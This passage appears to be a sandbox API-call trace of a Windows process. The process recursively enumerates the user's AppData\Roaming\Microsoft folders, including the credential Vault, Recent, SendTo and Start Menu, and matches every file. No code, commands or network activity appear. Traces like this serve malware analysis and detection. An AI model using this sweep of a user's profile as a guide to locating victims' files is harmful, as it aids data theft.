(in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.546] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.546] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.546] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.546] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Vault" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault" [0057.546] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*" [0057.546] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb072d8 [0057.546] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.546] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.546] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.546] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.546] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows" [0057.547] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*" [0057.547] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb072d8 [0057.547] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.547] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.547] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="AccountPictures" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures" [0057.547] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*" [0057.547] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb070d8 [0057.547] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.547] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.547] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.547] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.548] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.548] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.548] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0057.548] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0057.548] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07318 [0057.549] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.549] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.549] PathMatchSpecW (pszFile="CameraRoll.library-ms", pszSpec="*") returned 1 [0057.549] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.549] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.549] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.549] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*") returned 1 [0057.549] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.549] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*") returned 1 [0057.549] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.549] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*") returned 1 [0057.549] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.549] PathMatchSpecW (pszFile="SavedPictures.library-ms", pszSpec="*") returned 1 [0057.549] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.549] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*") returned 1 [0057.550] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.550] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.551] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.551] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0057.551] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0057.551] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb070d8 [0057.551] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.551] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.551] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.551] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.551] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0057.551] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0057.551] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb070d8 [0057.552] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.552] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.552] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.552] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.552] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Recent" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0057.552] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0057.552] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb070d8 [0057.552] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.552] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.552] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="AutomaticDestinations" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0057.553] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0057.553] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07558 [0057.553] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.553] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.553] PathMatchSpecW (pszFile="5f7b5f1e01b83767.automaticDestinations-ms", pszSpec="*") returned 1 [0057.553] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.553] PathMatchSpecW (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*") returned 1 [0057.553] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.553] PathMatchSpecW (pszFile="9d1f905ce5044aee.automaticDestinations-ms", pszSpec="*") returned 1 [0057.553] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.553] PathMatchSpecW (pszFile="f01b4d95cf55d32a.automaticDestinations-ms", pszSpec="*") returned 1 [0057.553] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.553] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.554] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.554] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="CustomDestinations" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0057.554] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0057.554] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07158 [0057.554] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.554] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.554] PathMatchSpecW (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*") returned 1 [0057.554] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.554] PathMatchSpecW (pszFile="f01b4d95cf55d32a.customDestinations-ms", pszSpec="*") returned 1 [0057.554] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.554] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.554] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.554] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.554] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.555] PathMatchSpecW (pszFile="http--www.google.com-.lnk", pszSpec="*") returned 1 [0057.555] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.555] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*") returned 1 [0057.555] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.555] PathMatchSpecW (pszFile="Mozilla Maintenance Service.lnk", pszSpec="*") returned 1 [0057.555] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.555] PathMatchSpecW (pszFile="Program Files (x86).lnk", pszSpec="*") returned 1 [0057.555] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.555] PathMatchSpecW (pszFile="System and Security.lnk", pszSpec="*") returned 1 [0057.555] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.555] PathMatchSpecW (pszFile="System.lnk", pszSpec="*") returned 1 [0057.555] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.555] PathMatchSpecW (pszFile="The Internet.lnk", pszSpec="*") returned 1 [0057.555] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.555] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.555] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.555] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="SendTo" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo" [0057.555] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0057.577] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07558 [0057.578] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.578] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.578] PathMatchSpecW (pszFile="Compressed (zipped) Folder.ZFSendToTarget", pszSpec="*") returned 1 [0057.578] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.578] PathMatchSpecW (pszFile="Desktop (create shortcut).DeskLink", pszSpec="*") returned 1 [0057.578] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.578] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.578] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.578] PathMatchSpecW (pszFile="Documents.mydocs", pszSpec="*") returned 1 [0057.578] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.578] PathMatchSpecW (pszFile="Fax Recipient.lnk", pszSpec="*") returned 1 [0057.578] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.578] PathMatchSpecW (pszFile="Mail Recipient.MAPIMail", pszSpec="*") returned 1 [0057.578] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.579] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.580] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.580] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Start Menu" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu" [0057.580] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0057.580] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07318 [0057.580] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.580] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.580] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.580] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.580] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="Programs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs" [0057.580] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0057.581] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07558 [0057.581] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.581] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.581] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessibility" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility" [0057.581] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*" [0057.581] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb071d8 [0057.581] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.581] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.581] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.582] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.582] PathMatchSpecW (pszFile="Magnify.lnk", pszSpec="*") returned 1 [0057.582] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.582] PathMatchSpecW (pszFile="Narrator.lnk", pszSpec="*") returned 1 [0057.582] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.582] PathMatchSpecW (pszFile="On-Screen Keyboard.lnk", pszSpec="*") returned 1 [0057.582] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.582] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.582] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.582] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessories" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0057.582] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0057.582] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI 